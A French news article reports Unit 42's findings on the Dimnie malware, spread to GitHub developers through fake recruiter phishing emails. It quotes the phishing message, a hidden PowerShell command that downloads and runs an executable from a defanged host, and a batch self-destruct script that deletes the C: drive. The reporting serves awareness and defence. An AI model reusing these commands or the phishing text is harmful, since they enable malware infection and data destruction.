Dans leur annonce, l’équipe des chercheurs affirme avoir pris connaissance, à la mi-janvier 2017, de plusieurs rapports émis par les développeurs open source. À en croire les explications, les développeurs propriétaires de dépôts GitHub reçoivent une multitude de courriels frauduleux via la technique de phishing. Les courriels identifiés par les chercheurs se présentent généralement comme suit :
Code : | Sélectionner tout |
1 2 3 4 5 6 7 8 | Hello, My name is Adam Buchbinder, I saw your GitHub repo and i'm pretty amazed. The point is that i have an open position in my company and looks like you are a good fit. Please take a look into attachment to find details about company and job. Dont hesitate to contact me directly via email highlighted in the document below. Thanks and regards, Adam. |
Les experts en sécurité de l’Unité 42 soulignent qu’il y a eu plusieurs vagues de campagne de phishing, cependant tous les mails qu’ils ont eus à exploiter sont accompagnés d’un même fichier en pièce jointe portant l’extension .doc (SHA256 : 6b9af3290723f081e090cd29113c8755696dca88f06d072dd75bf5560ca9408e). Ce dernier, selon les chercheurs, contient du code arbitraire qui permet d’exécuter une commande PowerShell qui est souvent utilisée pour télécharger et exécuter un fichier. Le code arbitraire en question se présente comme suit :
Code powershell : | Sélectionner tout |
cmd.exe /c "powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('hxxp://nicklovegrove.co[.]uk/wp-content/margin2601_onechat_word.exe','%appdata%.exe');start-process '%appdata%.exe'"
L'équipe de Palo Alto Networks affirme que différentes versions du malware utilisant les mêmes procédés de commande et de contrôle ont été identifiées depuis l'année 2014, soit il y a quatre ans déjà. La force de ce malware en l'occurrence Dimnie repose sur sa capacité à masquer ses traces de sorte que les outils d'analyse de trafic ne puissent pas le détecter, cela en ayant recours à plusieurs techniques très évoluées. Pour ce faire, le malware Dimnie va par exemple créer une requête proxy HTTP vers un service Google qui n'existe plus en réalité.
Cette requête, d'après les chercheurs, permet de cacher une connexion vers un serveur de contrôle et de commande géré par les attaquants. Il ressort des informations recueillies que le malware utilise de faux en-têtes d'image Jpeg pour masquer ses opérations de vol d’informations. Les informations volées sont chiffrées au niveau de ces faux en-têtes d'image, rendant ainsi leur détection assez difficile. Les chercheurs en sécurité soulignent que l'analyse des cookies montre que via l'activité de Dimnie, les attaquants ont la possibilité d'avoir plusieurs informations sur le système comme cela est présenté ci-après :
Code : | Sélectionner tout |
1 2 3 4 5 6 7 8 9 10 11 12 13 | [netbios name] WORKGROUP 2 HomeGroupUser$ [Hostname] [Language] 1 10.0.2.15 (08-00-27-D9-83-51) 'Intel(R) PRO/1000 MT-Desktopadapter' PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18 4 Administrator (0x10203) [Username] (0x10223) HomeGroupUser$ (0x10201) [Hostname] (0x10221) |
- la possibilité de récupérer les codes d’accès de certains services ;
- la possibilité de récupérer des captures d’écran ;
- la capacité à extraire frauduleusement des données ;
- la possibilité d'accéder à la liste des processus exécutés sur une machine :
- la possibilité d'exécuter un module d'autodestruction pour détruire les environnements infectés :
Code : Sélectionner tout 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20@echo off Title System need to reboot computer! color 0c Echo Auto Starting in 5 seconds @ping 127.0.0.1 -n 5 -w 1000 > nul @ping 127.0.0.1 -n %1% -w 1000 > nul cls Color 0e Echo delete disk C del C:\\ /s /q @ping 127.0.0.1 -n 3 -w 1000 > nul @ping 127.0.0.1 -n %1% -w 1000 > nul cls color 0c Echo Remove directory Rd C:\\ /s /q @ping 127.0.0.1 -n 3 -w 1000 > nul @ping 127.0.0.1 -n %1% -w 1000 > nul cls Msg * \SYSTEM ERROR!HARDDRIVE IS OUT OF ORDER!\;
Les auteurs du malware Dimnie restent pour le moment inconnus ; cependant certains médias émettent une probable tentative d'espionnage de la part d'autorités gouvernementales. Le malware pourrait également être l’œuvre de cybercriminels.
Source : Unité 42 de Palo Alto Networks
Et vous ?
Que pensez-vous de cette menace sur GitHub ?